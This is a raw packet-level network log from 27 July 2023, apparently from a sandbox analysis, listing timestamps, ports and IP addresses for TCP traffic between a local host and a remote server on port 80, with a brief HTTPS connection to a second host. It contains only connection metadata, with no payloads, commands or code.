Jul 27, 2023 20:19:05.674582005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674593925 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674633026 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674654961 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674654961 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674685001 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674690008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674732924 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674746990 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674781084 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674829006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674830914 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674875975 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674884081 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674923897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.674937010 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.674974918 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.700865984 CEST	49699	443	192.168.2.4	162.0.217.254
Jul 27, 2023 20:19:05.700905085 CEST	443	49699	162.0.217.254	192.168.2.4
Jul 27, 2023 20:19:05.941443920 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941483021 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941519022 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941553116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941591024 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941625118 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941660881 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941684008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941696882 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941725969 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941731930 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941736937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941766977 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941772938 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941802979 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941811085 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941838026 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941847086 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941873074 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941875935 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941909075 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941942930 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941951990 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.941978931 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.941982031 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.942013979 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.942049980 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.942064047 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.942085981 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.942097902 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.942121029 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:05.942131996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:05.942162037 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.208955050 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209028006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209076881 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209120035 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209167004 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209197998 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209212065 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209255934 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209258080 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209301949 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209310055 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209346056 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209348917 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209388971 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209434986 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209434986 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209480047 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209525108 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209527969 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209567070 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209568977 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209615946 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209659100 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209662914 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209702969 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209747076 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209755898 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209793091 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209793091 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209836006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209880114 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209883928 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.209923029 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209966898 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.209978104 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210011005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210019112 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210053921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210097075 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210103035 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210141897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210186005 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210191965 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210228920 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210232019 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210273981 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210319042 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210320950 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210362911 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210382938 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210401058 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210406065 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210449934 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210457087 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210499048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210514069 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210545063 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210549116 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210592985 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210602999 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210639954 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210650921 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210684061 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210715055 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210731030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.210733891 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.210926056 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475420952 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475472927 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475529909 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475563049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475594997 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475627899 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475660086 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475696087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475743055 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475778103 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475811958 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475846052 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475878000 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475873947 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475874901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475874901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475874901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475874901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475874901 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475913048 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475948095 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.475959063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475959063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475959063 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.475980997 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476000071 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476016045 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476041079 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476049900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476058960 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476084948 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476119995 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476136923 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476152897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476160049 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476186037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476212978 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476219893 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476233959 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476254940 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476337910 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476385117 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476387978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476407051 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476429939 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476473093 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476481915 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476517916 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476567030 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476598024 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476667881 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476707935 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476718903 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476747036 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476763964 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476785898 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476809978 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476845980 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476877928 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476912022 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476914883 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476954937 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.476960897 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.476993084 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477010965 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477011919 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477056026 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477096081 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477099895 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477116108 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477144957 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477160931 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477193117 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477196932 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477240086 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477283001 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477298975 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477332115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477349043 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477381945 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477394104 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477432013 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477471113 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477482080 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477519989 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477535963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477555037 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477587938 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477622032 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477638006 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477648020 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477685928 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477734089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477742910 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477782011 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477830887 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477840900 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477880001 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477894068 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.477929115 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477977037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.477984905 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478074074 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478125095 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478172064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478209972 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478219986 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478230000 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478269100 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478272915 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478322029 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478328943 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478373051 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478421926 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478427887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478470087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478518963 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478523016 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478565931 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478612900 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478620052 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478665113 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478710890 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478718996 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478759050 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478806973 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478813887 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478856087 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478868008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478907108 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478929043 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.478956938 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.478971958 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.479007959 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.479026079 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.479059935 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.479110956 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.743731022 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.743797064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.743843079 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.743889093 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.743926048 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.743926048 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.743926048 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744009018 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744061947 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744076967 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744107962 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744110107 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744153976 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744199991 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744210958 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744244099 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744313955 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744327068 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744374990 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744386911 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744419098 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744463921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744474888 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744508028 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744553089 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744564056 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744597912 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744601011 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744620085 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744643927 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744666100 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744689941 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744704008 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744734049 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744746923 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744780064 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744795084 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744823933 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744837046 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744868994 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744910955 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744913101 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744930983 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.744959116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.744976044 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745004892 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745018005 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745064974 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745078087 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745124102 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745168924 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745213032 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745251894 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745256901 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745287895 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745301008 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745345116 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745347977 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745368004 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745389938 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745409966 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745434046 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745465994 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745479107 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745501995 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745522976 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745568037 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745584965 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745611906 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745620966 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745657921 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745687962 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745703936 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745716095 CEST	49698	80	192.168.2.4	103.100.211.218
Jul 27, 2023 20:19:06.745750904 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745795012 CEST	80	49698	103.100.211.218	192.168.2.4
Jul 27, 2023 20:19:06.745839119 CEST	80	49698	103.100.211.218	192.168.2.4
